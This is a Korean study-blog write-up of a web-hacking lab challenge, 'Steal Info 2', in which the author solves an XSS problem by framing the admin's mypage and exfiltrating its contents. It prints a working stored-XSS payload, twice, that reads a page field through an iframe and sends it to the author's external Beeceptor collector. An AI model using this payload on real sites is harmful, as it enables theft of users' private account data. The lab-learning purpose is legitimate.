🕵️ Steal Info 2 문제 풀이: 서로 다른 페이지의 정보 강제 탈취
이어서 Steal info 2를 풀어보자. 12.31 수업도 결국 또 술자리 때문에 라이브로 못 들었다..(주말에 들어야 함) 이러나 저러나 드디어 진도를 거의 다 따라잡았다..! 반복해서 풀고 정리하니까 머리에 어느 정도 익숙해지고 있다!! (SQLi 다 까먹었는데 다행히 센세가 복습시켜주신다고 한다)
1. 문제 분석 및 통찰
문제 풀어보자. 형식은 Steal info 1과 동일하다. 차이는 이번에는 admin 계정의 마이페이지 정보란에 flag가 있다고 한다.
그럼 아까 풀었던 Basic Script Prac이랑 거의 비슷한 거 아닌가? 어디가 다르지? 고민하다 보니 가장 큰 차이는 Basic Script Prac에서는 XSS가 일어나는 페이지와 내가 원하는 정보가 같은 페이지에 있었고, 이번에는 이 둘이 서로 다른 페이지인 것이다.
💡 이번 문제의 핵심 통찰력
따라서 우리는 iframe을 통해 원하는 정보가 있는 페이지를 XSS가 일어나는 페이지로 강제로 끌어올 필요가 있는 셈이다. (통찰력 지렸다….)
2. 공격 페이로드 구성 및 실행
이미 Steal info 1로 단련이 되어있으니 사용자 계정 연습은 건너뛰고 바로 관리자 계정용 탈취하러 가보자.
이렇게 작성하고 이 게시글을 클릭해서 그 링크를 관리자 봇에게 전달해주면 된다.
최종 페이로드 예시:
<iframe id="TF" src="/mypage_info" onload="AT()"></iframe>
<script>
function AT() {
var secret = document.getElementById('TF').contentDocument.getElementsByName('info')[0].placeholder;
new Image().src = "https://[내-Beeceptor-주소]/?flag=" + secret;
}
</script>
<iframe id="TF" src="/mypage_info" onload="AT()"></iframe>
<script>
function AT() {
var secret = document.getElementById('TF').contentDocument.getElementsByName('info')[0].placeholder;
new Image().src = "https://[내-Beeceptor-주소]/?flag=" + secret;
}
</script>
3. 최종 결과
문법 오류도 없이 한방에 클리어… 개나이스…. 하다….
💡 마무리하며
여기까지 해서 XSS 문제 풀이는 마무리하고 다음 번에는 XSRF 개념 설명 및 문제 풀이 정리를 해보겠음!!! 뿌듯!
'해킹스터디' 카테고리의 다른 글
| [Normaltic 웹해킹 입문] 12주차 CSRF-Get Admin 1 (0) | 2026.01.05 |
|---|---|
| [Normaltic 웹해킹 입문] 12주차 CSRF-내용정리 (3) | 2026.01.05 |
| [Normaltic 웹해킹 입문] 10주차 문제풀이 Steal info 1. (0) | 2026.01.02 |
| [Normaltic 웹해킹 입문] 10주차 문제풀이 Basic script Prac (0) | 2026.01.02 |
| [Normaltic 웹해킹 입문] 9주차 문제풀이 XSS-Challenge (0) | 2026.01.02 |